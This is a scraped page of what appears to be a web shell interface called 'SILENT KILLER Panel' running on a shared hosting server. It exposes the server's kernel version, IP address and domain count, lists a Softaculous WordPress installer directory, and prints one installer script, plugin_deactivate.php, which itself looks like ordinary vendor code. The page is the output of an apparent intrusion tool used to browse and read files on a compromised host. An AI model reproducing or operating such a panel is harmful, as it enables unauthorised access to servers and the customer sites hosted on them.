SILENT KILLERPanel

Current Path: > > var > softaculous > wp67


Operation   : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software     : Apache
Server IP    : 185.61.154.216 | Your IP: 216.73.216.44
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //var/softaculous/wp67

NameTypeSizeLast ModifiedActions
images Directory - -
languages Directory - -
php53 Directory - -
php56 Directory - -
php71 Directory - -
php81 Directory - -
php82 Directory - -
plugins Directory - -
.htaccess File 482 bytes April 15 2025 11:47:12.
_htaccess File 553 bytes April 15 2025 11:47:12.
_index.php File 59 bytes April 15 2025 11:47:12.
_wp-config.php File 3473 bytes April 15 2025 11:47:12.
add_user.php File 461 bytes April 15 2025 11:47:12.
backup.php File 3091 bytes August 06 2025 12:33:30.
check_charset.php File 2067 bytes April 15 2025 11:47:12.
clone.php File 32999 bytes August 06 2025 12:33:30.
clone.xml File 497 bytes April 15 2025 11:47:12.
edit.php File 9672 bytes August 06 2025 12:33:30.
edit.xml File 1801 bytes April 15 2025 11:47:12.
extend.php File 95945 bytes August 06 2025 12:33:30.
fileindex.php File 291 bytes April 15 2025 11:47:12.
import.php File 6677 bytes August 06 2025 12:33:30.
info.xml File 15266 bytes August 06 2025 12:30:36.
install.js File 925 bytes April 15 2025 11:47:12.
install.php File 31544 bytes August 06 2025 12:33:30.
install.xml File 9938 bytes April 15 2025 11:47:12.
md5 File 4440 bytes August 06 2025 12:33:30.
multisite.sql File 38661 bytes August 06 2025 12:30:36.
notes.txt File 6222 bytes August 06 2025 12:30:36.
plugin_activate.php File 596 bytes April 15 2025 11:47:12.
plugin_deactivate.php File 613 bytes April 15 2025 11:47:12.
sign_on.php File 3359 bytes April 15 2025 11:47:12.
soft.htaccess File 127 bytes April 15 2025 11:47:12.
upgrade.php File 14515 bytes August 06 2025 12:33:30.
upgrade.xml File 1654 bytes April 15 2025 11:47:12.
wp-config.php File 3180 bytes April 15 2025 11:47:12.
wp67.sql File 30894 bytes August 06 2025 12:30:36.
wp67.zip File 28109823 bytes August 06 2025 12:30:36.

Reading File: //var/softaculous/wp67/plugin_deactivate.php

<?php

@unlink(__FILE__);

// Validate if the request is from Softaculous
if($_REQUEST['pass'] != '[[autopass]]'){
	die("Unauthorized Access");
}

require_once('wp-blog-header.php');
require_once('wp-includes/pluggable.php');
require_once('wp-admin/includes/plugin.php');

$plugins_to_deactivate = '[[plugins_to_deactivate]]';
$plugins_to_deactivate = unserialize($plugins_to_deactivate);

$ret = array();

foreach($plugins_to_deactivate as $plugn_file){
	// null means success
	$ret[$plugn_file] = deactivate_plugins($plugn_file);	
}

echo '<plugin_deactivate>'.serialize($ret).'</plugin_deactivate>';

exit(0);

SILENT KILLER Tool